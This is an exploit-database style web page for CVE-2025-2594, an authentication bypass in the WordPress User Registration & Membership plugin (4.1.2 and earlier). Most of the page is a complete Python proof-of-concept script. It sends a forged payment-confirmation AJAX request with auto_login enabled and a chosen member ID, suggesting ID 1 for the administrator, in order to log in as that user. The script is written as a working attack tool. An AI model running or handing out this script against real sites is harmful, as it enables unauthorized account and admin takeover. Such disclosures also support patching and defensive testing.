WordPress Plugin 4.1.2 Authentication Bypass Exploit

🚨 Exploit Title

User Registration & Membership Plugin ≤ 4.1.2 – Authentication Bypass
(CVE-2025-2594)

📅 Date: May 22, 2025

👨‍💻 Author: Mohammed Idrees Banyamer

🏠 Vendor Homepage: wordpress.org/plugins/user-registration

📦 Plugin Download: Download v4.1.2 ZIP

🔗 CVE: CVE-2025-2594

🔍 Vulnerability Overview

The User Registration & Membership plugin for WordPress (≤ 4.1.2) contains an authentication bypass vulnerability. An unauthenticated attacker can exploit this flaw to bypass login protections and gain unauthorized access to user accounts, including administrative ones, under specific configurations.

🧪 Proof of Concept

#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594

import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored

def banner():
    cprint("┌──────────────────────────────────────────────┐", "cyan")
    cprint("│ WordPress Plugin User Registration <= 4.1.2   │", "cyan")
    cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
    cprint("│ Author: Mohammed Idrees Banyamer             │", "cyan")
    cprint("└──────────────────────────────────────────────┘", "cyan")

def exploit(target_url, member_id, nonce):
    endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")

    files = {
        'action': (None, 'user_registration_membership_confirm_payment'),
        'security': (None, nonce),
        'form_response': (None, '{"auto_login": true}'),
        'member_id': (None, str(member_id))
    }

    cprint(f"[+] Target URL: {endpoint}", "yellow")
    cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")

    try:
        response = requests.post(endpoint, files=files, timeout=10)

        if response.status_code == 200 and '"success":true' in response.text:
            cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
            cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
            print("Server Response:")
            print(response.text)
        else:
            cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
            print("Server Response:")
            print(response.text)
    except requests.exceptions.RequestException as e:
        cprint(f"[!] Request failed: {e}", "red")

def main():
    banner()

    parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
    parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
    parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
    parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")

    args = parser.parse_args()

    exploit(args.target, args.member_id, args.nonce)

if __name__ == "__main__":
    main()

🧾 Tested On

WordPress 6.x running on Apache (Linux)